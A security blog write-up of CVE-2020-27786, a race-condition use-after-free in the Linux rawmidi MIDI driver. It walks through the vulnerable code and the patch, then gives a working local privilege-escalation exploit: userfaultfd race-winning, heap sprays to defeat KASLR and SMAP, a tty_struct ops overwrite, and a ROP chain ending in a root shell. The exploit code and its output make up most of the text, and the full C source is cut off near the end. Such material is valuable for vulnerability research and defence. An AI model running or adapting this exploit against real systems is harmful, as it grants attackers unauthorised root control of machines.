ii4gsp

CVE-2020-27786 ( Race Condition + Use-After-Free )


Introduction

This blog post describes how to exploit a use-after-free vulnerability due to a race condition in MIDI devices in Linux Kernel 5.6.13.
This vulnerability is identified as CVE-2020-27786.


Vulnerability

The MIDI driver can be opened through /dev/snd/midiC0D*. In order to open this driver, the CONFIG_SND_RAWMIDI option needs to be enabled. fops

static const struct file_operations snd_rawmidi_f_ops =
{
	.owner =	THIS_MODULE,
	.read =		snd_rawmidi_read,
	.write =	snd_rawmidi_write,
	.open =		snd_rawmidi_open,
	.release =	snd_rawmidi_release,
	.llseek =	no_llseek,
	.poll =		snd_rawmidi_poll,
	.unlocked_ioctl =	snd_rawmidi_ioctl,
	.compat_ioctl =	snd_rawmidi_ioctl_compat,
};


snd_rawmidi_ioctl() handles IOCTL commands, and passing SNDRV_RAWMIDI_IOCTL_PARAMS as a parameter will call snd_rawmidi_output_params(). snd_rawmidi_ioctl()

static long snd_rawmidi_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
	struct snd_rawmidi_file *rfile;
	void __user *argp = (void __user *)arg;

	rfile = file->private_data;
	if (((cmd >> 8) & 0xff) != 'W')
		return -ENOTTY;
	switch (cmd) {
	case SNDRV_RAWMIDI_IOCTL_PVERSION:
		return put_user(SNDRV_RAWMIDI_VERSION, (int __user *)argp) ? -EFAULT : 0;
	case SNDRV_RAWMIDI_IOCTL_INFO:
	{
		int stream;
		struct snd_rawmidi_info __user *info = argp;

		if (get_user(stream, &info->stream))
			return -EFAULT;
		switch (stream) {
		case SNDRV_RAWMIDI_STREAM_INPUT:
			return snd_rawmidi_info_user(rfile->input, info);
		case SNDRV_RAWMIDI_STREAM_OUTPUT:
			return snd_rawmidi_info_user(rfile->output, info);
		default:
			return -EINVAL;
		}
	}
	case SNDRV_RAWMIDI_IOCTL_PARAMS:
	{
		struct snd_rawmidi_params params;

		if (copy_from_user(&params, argp, sizeof(struct snd_rawmidi_params)))
			return -EFAULT;
		switch (params.stream) {
		case SNDRV_RAWMIDI_STREAM_OUTPUT:
			if (rfile->output == NULL)
				return -EINVAL;
			return snd_rawmidi_output_params(rfile->output, &params);
		case SNDRV_RAWMIDI_STREAM_INPUT:
			if (rfile->input == NULL)
				return -EINVAL;
			return snd_rawmidi_input_params(rfile->input, &params);
		default:
			return -EINVAL;
		}
	}
        ...
}


In snd_rawmidi_output_params(), we call resize_runtime_buffer() to update the buffer.

int snd_rawmidi_output_params(struct snd_rawmidi_substream *substream,
			      struct snd_rawmidi_params *params)
{
	if (substream->append && substream->use_count > 1)
		return -EBUSY;
	snd_rawmidi_drain_output(substream);
	substream->active_sensing = !params->no_active_sensing;
	return resize_runtime_buffer(substream->runtime, params, false);
}
EXPORT_SYMBOL(snd_rawmidi_output_params);


[A] In this part, we are calling kvzalloc to allocate newbuf. When allocating kernel memory, you can resize it to any value that you control. In [B], we assign runtime->buffer to oldbuf. In [C], we call kvfree to free oldbuf.

static int resize_runtime_buffer(struct snd_rawmidi_runtime *runtime,
				 struct snd_rawmidi_params *params,
				 bool is_input)
{
	char *newbuf, *oldbuf;

	if (params->buffer_size < 32 || params->buffer_size > 1024L * 1024L)
		return -EINVAL;
	if (params->avail_min < 1 || params->avail_min > params->buffer_size)
		return -EINVAL;
	if (params->buffer_size != runtime->buffer_size) {
		newbuf = kvzalloc(params->buffer_size, GFP_KERNEL); // [A]
		if (!newbuf)
			return -ENOMEM;
		spin_lock_irq(&runtime->lock);
		oldbuf = runtime->buffer; // [B]
		runtime->buffer = newbuf;
		runtime->buffer_size = params->buffer_size;
		__reset_runtime_ptrs(runtime, is_input);
		spin_unlock_irq(&runtime->lock);
		kvfree(oldbuf); // [C]
	}
	runtime->avail_min = params->avail_min;
	return 0;
}


Calling write on a MIDI device calls snd_rawmidi_write(), which in turn calls snd_rawmidi_kernel_write1().

static ssize_t snd_rawmidi_write(struct file *file, const char __user *buf,
				 size_t count, loff_t *offset)
{
    ...
		count1 = snd_rawmidi_kernel_write1(substream, buf, NULL, count);
		if (count1 < 0)
			return result > 0 ? result : count1;
		result += count1;
		buf += count1;
		if ((size_t)count1 < count && (file->f_flags & O_NONBLOCK))
			break;
		count -= count1;
	...
}


In snd_rawmidi_kernel_wrtie1(), call spin_unlock_irqrestore() to temporarily unlock the spinlock and call copy_from_user() to copy data from user space to kernel space. Because we call `spin_unlock_irqrestore’ to temporarily unlock the runtime lock and then copy the data, we can modify the object during the copy_from_user call.

static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream,
				      const unsigned char __user *userbuf,
				      const unsigned char *kernelbuf,
				      long count)
{
    ...
		if (kernelbuf)
			memcpy(runtime->buffer + appl_ptr,
			       kernelbuf + result, count1);
		else if (userbuf) {
			spin_unlock_irqrestore(&runtime->lock, flags);
			if (copy_from_user(runtime->buffer + appl_ptr,
					   userbuf + result, count1)) {
				spin_lock_irqsave(&runtime->lock, flags);
				result = result > 0 ? result : -EFAULT;
				goto __end;
			}
			spin_lock_irqsave(&runtime->lock, flags);
		}
		result += count1;
		count -= count1;
	}
    ...
}


Patch

The vulnerability was patched in commit c13f1463d84b86bedb664e509838bef37e6ea317 by adding the functions snd_rawmidi_buffer_ref and snd_rawmidi_buffer_unref. When runtime->buffer is being referenced, call snd_rawmidi_buffer_ref to increment the buffer_ref, and call snd_rawmidi_buffer_unref to decrement the buffer_ref when it is not being used.

In the patched resize_runtime_buffer, the runtime->buffer_ref check returns an error if runtime->buffer is being referenced. Additionally, in snd_rawmidi_kernel_read1 and snd_rawmidi_kernel_write1, when reading or writing to runtime->buffer, snd_rawmidi_buffer_ref is called to increment runtime->buffer_ref. Once the operation is completed, snd_rawmidi_buffer_unref is called to decrement runtime->buffer_ref.

diff --git a/include/sound/rawmidi.h b/include/sound/rawmidi.h
index a36b7227a15ad..334842daa9045 100644
--- a/include/sound/rawmidi.h
+++ b/include/sound/rawmidi.h
@@ -61,6 +61,7 @@ struct snd_rawmidi_runtime {
 	size_t avail_min;	/* min avail for wakeup */
 	size_t avail;		/* max used buffer for wakeup */
 	size_t xruns;		/* over/underruns counter */
+	int buffer_ref;		/* buffer reference count */
 	/* misc */
 	spinlock_t lock;
 	wait_queue_head_t sleep;
diff --git a/sound/core/rawmidi.c b/sound/core/rawmidi.c
index 20dd08e1f6756..2a688b711a9ac 100644
--- a/sound/core/rawmidi.c
+++ b/sound/core/rawmidi.c
@@ -120,6 +120,17 @@ static void snd_rawmidi_input_event_work(struct work_struct *work)
 		runtime->event(runtime->substream);
 }
 
+/* buffer refcount management: call with runtime->lock held */
+static inline void snd_rawmidi_buffer_ref(struct snd_rawmidi_runtime *runtime)
+{
+	runtime->buffer_ref++;
+}
+
+static inline void snd_rawmidi_buffer_unref(struct snd_rawmidi_runtime *runtime)
+{
+	runtime->buffer_ref--;
+}
+
 static int snd_rawmidi_runtime_create(struct snd_rawmidi_substream *substream)
 {
 	struct snd_rawmidi_runtime *runtime;
@@ -669,6 +680,11 @@ static int resize_runtime_buffer(struct snd_rawmidi_runtime *runtime,
 		if (!newbuf)
 			return -ENOMEM;
 		spin_lock_irq(&runtime->lock);
+		if (runtime->buffer_ref) {
+			spin_unlock_irq(&runtime->lock);
+			kvfree(newbuf);
+			return -EBUSY;
+		}
 		oldbuf = runtime->buffer;
 		runtime->buffer = newbuf;
 		runtime->buffer_size = params->buffer_size;
@@ -1019,8 +1035,10 @@ static long snd_rawmidi_kernel_read1(struct snd_rawmidi_substream *substream,
 	long result = 0, count1;
 	struct snd_rawmidi_runtime *runtime = substream->runtime;
 	unsigned long appl_ptr;
+	int err = 0;
 
 	spin_lock_irqsave(&runtime->lock, flags);
+	snd_rawmidi_buffer_ref(runtime);
 	while (count > 0 && runtime->avail) {
 		count1 = runtime->buffer_size - runtime->appl_ptr;
 		if (count1 > count)
@@ -1039,16 +1057,19 @@ static long snd_rawmidi_kernel_read1(struct snd_rawmidi_substream *substream,
 		if (userbuf) {
 			spin_unlock_irqrestore(&runtime->lock, flags);
 			if (copy_to_user(userbuf + result,
-					 runtime->buffer + appl_ptr, count1)) {
-				return result > 0 ? result : -EFAULT;
-			}
+					 runtime->buffer + appl_ptr, count1))
+				err = -EFAULT;
 			spin_lock_irqsave(&runtime->lock, flags);
+			if (err)
+				goto out;
 		}
 		result += count1;
 		count -= count1;
 	}
+ out:
+	snd_rawmidi_buffer_unref(runtime);
 	spin_unlock_irqrestore(&runtime->lock, flags);
-	return result;
+	return result > 0 ? result : err;
 }
 
 long snd_rawmidi_kernel_read(struct snd_rawmidi_substream *substream,
@@ -1342,6 +1363,7 @@ static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream,
 			return -EAGAIN;
 		}
 	}
+	snd_rawmidi_buffer_ref(runtime);
 	while (count > 0 && runtime->avail > 0) {
 		count1 = runtime->buffer_size - runtime->appl_ptr;
 		if (count1 > count)
@@ -1373,6 +1395,7 @@ static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream,
 	}
       __end:
 	count1 = runtime->avail < runtime->buffer_size;
+	snd_rawmidi_buffer_unref(runtime);
 	spin_unlock_irqrestore(&runtime->lock, flags);
 	if (count1)
 		snd_rawmidi_output_trigger(substream, 1);


Winning the Race

In this article, we’ll use the userfaultfd technique to win the race. userfaultfd is a system call that allows a thread in user space, rather than the kernel, to allocate new physical memory in the event of a page fault. By using userfaultfd when accessing a user page, you can block the kernel from executing until you complete the desired task. This article does not cover the detailed workings of the userfaultfd technique, and for a comprehensive understanding of how userfaultfd is utilized in exploit scenarios, please refer to this detailed blog post. https://blog.lizzie.io/using-userfaultfd.html

FUSE

Because userfaultfd has been patched to prevent unprivileged users from using it since Linux Kernel version 5.11, FUSE can still be used in kernels 5.11 and later to suspend kernel threads. If you’re interested in learning more about the FUSE technique, I recommend reading the following. https://exploiter.dev/blog/2022/FUSE-exploit.html


Exploitation Overview

This is a short summary of the exploitation stragy

  1. Spray the timerfd_ctx and msg_msg structures in kmalloc-256.

  2. Overwrite the m_ts field of the msg_msg structure with a large value.

  3. Request a message via msgrcv() with a larger size than the size used in msgsnd(), triggering an out-of-bounds read to leak timerfd_ctx.

  4. Spray a message containing the ROP chain and fake table in kmalloc-512.

  5. Overwrite the m_ts field of the msg_msg structure with a large value.

  6. Compute the address of the user-controlled heap (kmalloc-512) by leaking the m_list.next of the msg_msg structure by requesting a message via msgrcv() with a size larger than the size used in msgsnd().

  7. Spray the tty_struct structures in kmalloc-1024.

  8. Overwrite the tty_struct->ops pointer with the fake table address.

  9. When calling ioctl, pass the address containing the ROP chain as the third argument.


KASLR Bypass

The first step in the exploit is to bypass KASLR. To bypass KASLR, we use struct msg_msg to create a arbitrary read. To create a arbitrary read, we overwrite the m_ts field of struct msg_msg. For more information on this structure, check out the wall-of-perdition and this post by Vitaly Nikolenko.

struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;      /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
};


This object is allocated in the kmalloc-256 cache when the timer instance is created by timerfd_create(). For more information on this structure, check out the hotrod post.

struct timerfd_ctx {
	union {
		struct hrtimer tmr;
		struct alarm alarm;
	} t;
	ktime_t tintv;
	ktime_t moffs;
	wait_queue_head_t wqh;
	u64 ticks;
	int clockid;
	short unsigned expired;
	short unsigned settime_flags;	/* to show in fdinfo */
	struct rcu_head rcu;
	struct list_head clist;
	spinlock_t cancel_lock;
	bool might_cancel;
};


A function pointer exists in struct hrtimer we can leak the function pointer of struct hrtimer to get the address of the Kernel Base. When you enable the timer, the timerfd_ctx->tmr->function is set to timerfd_tmrproc(), which is a kernel .text pointer.

struct hrtimer {
	struct timerqueue_node		node;
	ktime_t				_softexpires;
	enum hrtimer_restart		(*function)(struct hrtimer *);
	struct hrtimer_clock_base	*base;
	u8				state;
	u8				is_rel;
	u8				is_soft;
	u8				is_hard;
};


The following code snippet demonstrates how to use these structures to bypass KASLR by leaking the kernel base address:

    int qid[1];
    if ((qid[0] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
    {
        perror("msgget");
        exit(1);
    }

    struct itimerspec its;

    its.it_interval.tv_sec = 0;
    its.it_interval.tv_nsec = 0;
    its.it_value.tv_sec = 9999;
    its.it_value.tv_nsec = 0;

    int tfd[256];

    for(int i = 0; i < 256 / 2; i++)
    {
        tfd[i] = timerfd_create(CLOCK_REALTIME, 0);
        timerfd_settime(tfd[i], 0, &its, 0);
    }

    if ((page = mmap((void *)0x1336000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)
    {
        perror("[-] mmap()");
        exit(0);
    }

    puts("[+] Mapping two pages");

    char *addr = page;
    memset(addr, 'A', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */
    pthread_create(&thread[0], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 256 */
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;
    srp.buffer_size = 240;
    srp.avail_min = 1;
    uint64_t err = ioctl(fd, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Created one object by size 256");

    if (err < 0)
    {
        perror("[-] ioctl");
        exit(0);	
    }

    struct args_trigger args;
    args.addr = addr + PAGE_SIZE - 0x18;
    args.fd= fd;

    /* Blocking before object created by size 256 in userfault */
    pthread_create(&thread[1], NULL, (void *) trigger_userfaultfd, &args);
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 256 generating an UAF */
    srp.buffer_size = 250;
    err = ioctl(fd, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Deleting before object created by size 256 generating UAF");

    if (err < 0)
    {
        perror("[-] ioctl");
        exit(0);	
    }

    /* send_msg 'A' */
    send_msg(qid[0], 0xf8, 'A');

    puts("[+] Allocate msg_msg in kmalloc-256");

    printf("[*] Waiting for userfaultd to finish ..\n");
    release_page_fault = true;

    /* spray timerfd_ctx in kmalloc-256 */
    for(int i = 256 / 2; i < 256; i++)
    {
        tfd[i] = timerfd_create(CLOCK_REALTIME, 0);
        timerfd_settime(tfd[i], 0, &its, 0);
    }

    puts("[+] Allocate timerfd_ctx in kmalloc-256");

    while(release_page_fault == true);
    printf("[+] Page fault lock released\n");

    uint64_t *leak = recv_msg(qid[0], 0x2000);

    // hexdump(leak, 0x2000);

    unsigned long timerfd_tmrproc =  *(leak + (0x200 / sizeof(uint64_t)));
    unsigned long kernel_base = timerfd_tmrproc - 0x2201f0;

    printf("[+] timerfd_tmrproc addr : 0x%lx\n", timerfd_tmrproc);
    printf("[+] kernel_base addr : 0x%lx\n", kernel_base);


This output confirms that the timerfd_tmrproc address was successfully leaked, allowing the computation of the kernel_base address, thus bypassing KASLR.

/ $ ./leak
0x0 0000000000000001 4141414141414141
0x10 4141414141414141 4141414141414141
0x20 4141414141414141 4141414141414141
0x30 4141414141414141 4141414141414141
0x40 4141414141414141 4141414141414141
0x50 4141414141414141 4141414141414141
0x60 4141414141414141 4141414141414141
0x70 4141414141414141 4141414141414141
0x80 4141414141414141 4141414141414141
0x90 4141414141414141 4141414141414141
0xa0 4141414141414141 4141414141414141
0xb0 4141414141414141 4141414141414141
0xc0 4141414141414141 4141414141414141
0xd0 0000000000000000 0000000000000000
0xe0 0000000000000000 0000000000000000
0xf0 0000000000000000 0000000000000000
0x100 0000000000000000 0000000000000000
0x110 0000000000000000 0000000000000000
0x120 0000000000000000 0000000000000000
0x130 0000000000000000 0000000000000000
0x140 0000000000000000 0000000000000000
0x150 0000000000000000 0000000000000000
0x160 0000000000000000 0000000000000000
0x170 0000000000000000 0000000000000000
0x180 0000000000000000 0000000000000000
0x190 0000000000000000 0000000000000000
0x1a0 0000000000000000 0000000000000000
0x1b0 0000000000000000 0000000000000000
0x1c0 0000000000000000 0000000000000000
0x1d0 0000000000000000 ffff9008ff948301
0x1e0 0000000000000000 0000000000000000
0x1f0 0000091a45dcff71 0000091a45dcff71
0x200 ffffffffb12201f0 ffff90097bc1ee80
0x210 0000000001000001 0000000000000000
0x220 0000000000000000 0000000000000000
0x230 0000000000000000 0000000000000000
0x240 0000000000000000 0000000000000000
0x250 0000000000000000 17dd62bd7a22594d
0x260 0000000000000000 ffff9008ff948290
0x270 ffff9008ff948290 0000000000000000
...
...
0x1fe0 0000000000000000 0000000000000000
0x1ff0 0000000000000000 0000000000000000
[+] timerfd_tmrproc addr : 0xffffffffb12201f0
[+] kernel_base addr : 0xffffffffb1000000
/ $


RIP Control

The struct tty_struct was chosen for exploitation primarily because of its tty_struct->ops pointer, which is a pointer to a table of function pointer. When you open /dev/ptmx, the corresponding struct tty_struct is allocated in the kmalloc-1024 cache.

struct tty_struct {
	int magic;
	struct kref kref;
	struct device *dev;
	struct tty_driver *driver;
	const struct tty_operations *ops;
	int index;

	/* Protects ldisc changes: Lock tty not pty */
	struct ld_semaphore ldisc_sem;
	struct tty_ldisc *ldisc;
    ...
}


The struct tty_operations, which the ops pointer in tty_struct references, contains function pointers to various functions that handle operations on tty devices, such as ioctl, open, close, etc.

struct tty_operations
{
    struct tty_struct * (*lookup)(struct tty_driver *driver,
        struct file *filp, int idx);
    int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
    void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
    int  (*open)(struct tty_struct * tty, struct file * filp);
    void (*close)(struct tty_struct * tty, struct file * filp);
    void (*shutdown)(struct tty_struct *tty);
    void (*cleanup)(struct tty_struct *tty);
    int  (*write)(struct tty_struct * tty,
            const unsigned char *buf, int count);
    int  (*put_char)(struct tty_struct *tty, unsigned char ch);
    void (*flush_chars)(struct tty_struct *tty);
    int  (*write_room)(struct tty_struct *tty);
    int  (*chars_in_buffer)(struct tty_struct *tty);
    int  (*ioctl)(struct tty_struct *tty,
          unsigned int cmd, unsigned long arg);
    ...
};


When calling ioctl() on /dev/ptmx, you have the ability to control several register values, which is crucial for constructing and executing a ROP chain. Specifically, you can specify arbitrary values for the 4-byte registers RBX, RCX, and RSI using the second argument to ioctl. Additionally, you can control the 8-byte registers RDX, R8, and R12 with the third argument.

int  (*ioctl)(struct tty_struct *tty,
          unsigned int cmd, unsigned long arg);


I discovered the following stack pivot gadget, which allows you to set the rsp register to a controlled location by passing the desired address as the third argument to ioctl:

0x8fc625: push r8 ; add byte ptr [rbp + 0x41], bl ; pop rsp ; pop r13 ; ret


Heap Leak

When SMAP is enabled, the ROP chain must be placed in a user-controlled heap area of the kernel, as directly specifying a user address is not allowed.

As in the first step of the exploit, we use the struct msg_msg to create an arbitrary read. To create an arbitrary read, we overwrite the m_ts field of the struct msg_msg. We can leak msg_msg->m_list.next to find the heap address where the ROP chain and the fake function table are placed. image


The following code snippet demonstrates how to spray an ROP chain and a fake function table onto the kernel heap and subsequently leak the heap address.

    /* rop spray in kmalloc-512 */
    char secondary_buf[0x1ea - 0x30];
    memset(secondary_buf, 0, sizeof(secondary_buf));
    build_rop(secondary_buf);

    printf("[*] Waiting for userfaultd to finish ..\n");
    release_page_fault = true;

    for(int i = 0; i < 0x20; i++)
    {
        send_msg(qid[1], secondary_buf, 0x1ea, 0x1337);
    }

    puts("[+] Spray ROP Chain in kmalloc-512");

    while(release_page_fault == true);
    printf("[+] Page fault lock released\n");

    uint64_t *leak2 = recv_msg(qid[1], 0x2000);
    next = *(leak2 + (0x1d8 / sizeof(uint64_t))) + 0x30;
    fake_table = next + 0x100;

    printf("[+] msg_msg->m_list.next leak : 0x%lx\n", next - 0x30);
    printf("[+] Fake tty_struct->ops function table: 0x%lx\n", fake_table);


The following code snippet demonstrates how to configure the ROP Chain and Fake Function Table in the buffer. The Fake Function Table is strategically placed at an address offset by 0x100 from the beginning of the ROP chain.

void build_rop(char *buf)
{
    uint64_t *rop = (uint64_t *)&buf[0x0];
    int k = 0;

    /* commit_creds(prepare_kernel_cred(0)) */
    rop[k++] = kernel_base + 0x15e8; // pop rdi ; ret
    rop[k++] = 0x0;
    rop[k++] = kernel_base + 0x8a800; // prepare_kernel_cred
    rop[k++] = kernel_base + 0x49fb8; // pop rdx ; ret
    rop[k++] = 0x8;
    rop[k++] = kernel_base + 0xa6b081; // cmp rdx, 8 ; jne 0xffffffff81a6b05e ; ret
    rop[k++] = kernel_base + 0x3dfdb4; // mov rdi, rax ; jne 0xffffffff813dfda1 ; xor eax, eax ; ret
    rop[k++] = kernel_base + 0x8a3c0; // commit_creds

    /* kpti trampoline */
    rop[k++] = kernel_base + 0xc00a45; // swapgs_restore_regs_and_return_to_usermode + 22
    rop[k++] = 0x0; // rax
    rop[k++] = 0x0; // rdi
    
    rop[k++] = (unsigned long)&getRootShell;
    rop[k++] = (unsigned long)usr_cs;
    rop[k++] = (unsigned long)usr_rflags;
    rop[k++] = (unsigned long)usr_sp;
    rop[k++] = (unsigned long)usr_ss;

    uint64_t *func_table = (uint64_t *)&buf[0x100];
    for (size_t i = 0; i < 12; i++)
    {
        if (i == 4)
        {
            *func_table++ = kernel_base + 0x1e; // ret;
            continue;
        }

        if (i == 5)
        {
            *func_table++ = kernel_base + 0x1e; // ret
            continue;
        }

        if (i == 6)
        {
            *func_table++ = kernel_base + 0x1e; // ret
            continue;
        }

        *func_table++ = 0xdeadbeefdeadbe00 + i;
    }

    *func_table = pivot;
}


ROP

Now that we know the addresses of our ROP chain and fake function table, it uses a use-after-free write to overwrite the tty_struct->ops pointer with the address of the fake function table. After that, when ioctl is triggered, a stack pivot occurs to redirect execution to the ROP chain, which is then executed to achieve the exploit’s goal.

image


To use the stack pivot gadget, specifically the pop rsp; pop r13; instructions, you need to account for the stack address increment caused by pop r13. Therefore, you must pass the address of the stack pivot minus 8 bytes as the argument. The following code snippet achieves this:

for(int i = 0; i < 256; i++)
{
    ioctl(spray[i], 0, next - 8);
}


You can run exploit to successfully obtain a shell with root privileges.

/ $ id
uid=1000(user) gid=1000(user) groups=1000(user)
/ $ uname -a
Linux (none) 5.6.13 #1 SMP Tue Feb 27 00:45:10 PST 2024 x86_64 GNU/Linux
/ $ ./exploit
[+] STEP 1 : KASLR leak
[+] Opening rawmidi
[+] Mapping two pages
[+] Registering one page userfaultfd
[*] Start monitoring range: 0x1336000 - 0x1337000
[+] Userfaultfd registered
[+] Raising up the handler for userfaultfd
[+] Created one object by size 256
[+] Triggering userfaultfd
[+] Page Fault triggered on address 0x1337000
[+] Deleting before object created by size 256 generating UAF
[+] Allocate msg_msg in kmalloc-256
[*] Waiting for userfaultd to finish ..
[+] Allocate timerfd_ctx in kmalloc-256
[+] Page fault lock released
[+] timerfd_tmrproc addr : 0xffffffffbcc201f0
[+] kernel_base addr : 0xffffffffbca00000
[+] pivot addr : 0xffffffffbd2fc625
[+] Close rawmidi

[+] STEP 2 : SMAP bypass
[+] Opening rawmidi
[+] Mapping two pages
[+] Registering one page userfaultfd
[*] Start monitoring range: 0x3330000 - 0x3331000
[+] Userfaultfd registered
[+] Raising up the handler for userfaultfd
[+] Created one object by size 512
[+] Triggering userfaultfd
[+] Page Fault triggered on address 0x3331000
[+] Deleting before object created by size 512 generating UAF
[*] Waiting for userfaultd to finish ..
[+] Spray ROP Chain in kmalloc-512
[+] Page fault lock released
[+] msg_msg->m_list.next leak : 0xffff8c346fb40e00
[+] Fake tty_struct->ops function table: 0xffff8c346fb40f30
[+] Close rawmidi

[+] STEP 3 : Fake tty_struct->ops overwrite
[+] Re-opening rawmidi
[+] Mapping two pages
[+] Registering one page userfaultfd
[*] Start monitoring range: 0x5550000 - 0x5551000
[+] Userfaultfd registered
[+] Raising up the handler for userfaultfd
[+] Created one object by kmalloc-1024
[+] Triggering userfaultfd
[+] Page Fault triggered on address 0x5551000
[+] Deleting before object created by size 1024 generating UAF
[+] Allocate tty_struct in kmalloc-1024
[+] Page fault lock released
[+] uid : 0
[+] Got root.
/ # id
uid=0(root) gid=0(root)
/ # whoami
root
/ #


Full Exploit

// gcc -o exploit exploit.c -masm=intel -static -s -lpthread
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <sound/asound.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/userfaultfd.h>
#include <sys/timerfd.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <pthread.h>
#include <poll.h>

#define errExit(msg)    do { perror(msg); exit(EXIT_FAILURE); \
                        } while (0)
                        
#define ADDRESS_PAGE_FAULT1 0x1337000
#define ADDRESS_PAGE_FAULT2 0x3331000
#define ADDRESS_PAGE_FAULT3 0x5551000
#define PAGE_SIZE 0x1000
#define DRIVER_RAWMIDI "/dev/snd/midiC0D0"

#define SNDRV_RAWMIDI_STREAM_OUTPUT 0

uint32_t uffd;
uint32_t fd1, fd2, fd3;
uint64_t next;
uint64_t fake_table;

pthread_t thread[6];

bool release_page_fault = false;

static void *page;

unsigned long pivot;
unsigned long kernel_base;
unsigned long timerfd_tmrproc;

unsigned long usr_cs, usr_ss, usr_rflags, usr_sp;

struct args_trigger
{
    char *addr;
    int size;
    uint32_t fd;
};

void hexdump(uint64_t *buf, uint64_t size)
{
    for (int i = 0; i < size / 8; i += 2)
    {
        printf("0x%x ", i * 8);
        printf("%016lx %016lx\n", buf[i], buf[i + 1]);
    }
}

static void save_state()
{
    __asm__ __volatile__(
    "movq %0, cs;"
    "movq %1, ss;"
    "pushfq;"
    "popq %2;"
    "movq %3, %%rsp\n"
    : "=r" (usr_cs), "=r" (usr_ss), "=r" (usr_rflags), "=r" (usr_sp) : : "memory" );
}

static void getRootShell()
{
    if(getuid())
    {
        printf("[-] Failed to get a root");
        exit(0);
    }

    printf("[+] uid : %d\n", getuid());
    printf("[+] Got root.\n");

    execl("/bin/sh", "sh", NULL);
}

void register_userfaultfd(uint64_t *range)
{
    struct uffdio_api uffdio_api;
    struct uffdio_register uffdio_register;

    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);

    if (uffd == -1)
    {
        perror("[-] userfaultfd");
        exit(0);
    }

    uffdio_api.api = UFFD_API;
    uffdio_api.features = 0;

    if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
    {
        perror("[-] ioctl");
        exit(0);
    }

    printf("[*] Start monitoring range: %p - %p\n", page, page + PAGE_SIZE);

    uffdio_register.range.start = (uint64_t) range;
    uffdio_register.range.len = PAGE_SIZE;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;

    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
    {
        perror("[-] ioctl");
        exit(0);
    }

    puts("[+] Userfaultfd registered");
}

void *handler_userfaultfd(void *args)
{
    uint64_t uffd = *(uint64_t *)args;

    struct uffd_msg msg;
    struct uffdio_copy uffdio_copy;
    uint64_t nread;
    void *page2 = NULL;

    if ((page2 = mmap((void *)0xdead000, PAGE_SIZE * 5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)
    {
        perror("[-] mmap()");
        exit(0);
    }

    uint64_t m_ts = 0x000000000000ffff;
    memcpy(page2, (char *) &m_ts, 8);

    while (true)
    {
        struct pollfd pollfd;
        int nready;

        pollfd.fd = uffd;
        pollfd.events = POLLIN;
        
        nready = poll(&pollfd, 1, -1);

        if (nready == -1)
        {
            perror("[-] poll");
            exit(0);
        }

        nread = read(uffd, &msg, sizeof(msg));
        
        if (nread == 0)
        {
            perror("[-] EOF on userfaultfd!\n");
            exit(0);
        }

        if (nread == -1)
        {
            perror("[-] read");
            exit(0);
        }

        char *page_fault_location = (char *)msg.arg.pagefault.address;

        if (msg.event != UFFD_EVENT_PAGEFAULT)
        {
            perror("[-] Unexpected event on userfaultfd");
            exit(0);
        }

        if (msg.arg.pagefault.address == (void *)0x1337000 || msg.arg.pagefault.address == (void *)0x3331000 || msg.arg.pagefault.address == (void *)0x5551000)
        {
            printf("[+] Page Fault triggered on address 0x%llx\n", msg.arg.pagefault.address);

            if(msg.arg.pagefault.address == (void *)0x5551000)
            {
                memcpy(page2, (char *) &fake_table, 8);
            }

            while (release_page_fault == false);

            uffdio_copy.src = (uint64_t) page2;
            uffdio_copy.dst = (uint64_t) msg.arg.pagefault.address &~(PAGE_SIZE - 1);
            uffdio_copy.len = PAGE_SIZE;
            uffdio_copy.mode = 0;
            uffdio_copy.copy = 0;

            if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
            {
                perror("[-] ioctl");
                exit(0);
            }

            release_page_fault = false;
        }
    }

    close(uffd);
    puts("[+] Page fault thread finished");
}

void *trigger_userfaultfd(struct args_trigger *args)
{
    char *addr = (char *) args->addr;
    int size = args->size;
    uint32_t fd = (uint64_t) args->fd;

    write(fd, addr, size);
}

void send_msg(int qid, const void *msg_buf, size_t size, long mtype)
{
    struct msgbuf
    {
        long mtype;
        char mtext[size - 0x30];
    } msg;

    msg.mtype = mtype;
    memcpy(msg.mtext, msg_buf, sizeof(msg.mtext));

    if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)
    {
        perror("msgsnd");
        exit(1);
    }
}

void *recv_msg(int qid, size_t size)
{
    void *memdump = malloc(size);

    if (msgrcv(qid, memdump, size, 0, IPC_NOWAIT | MSG_NOERROR) == -1)
    {
        perror("msgrcv");
        return NULL;
    }

    return memdump;
}

void build_rop(char *buf)
{
    uint64_t *rop = (uint64_t *)&buf[0x0];
    int k = 0;

    /* commit_creds(prepare_kernel_cred(0)) */
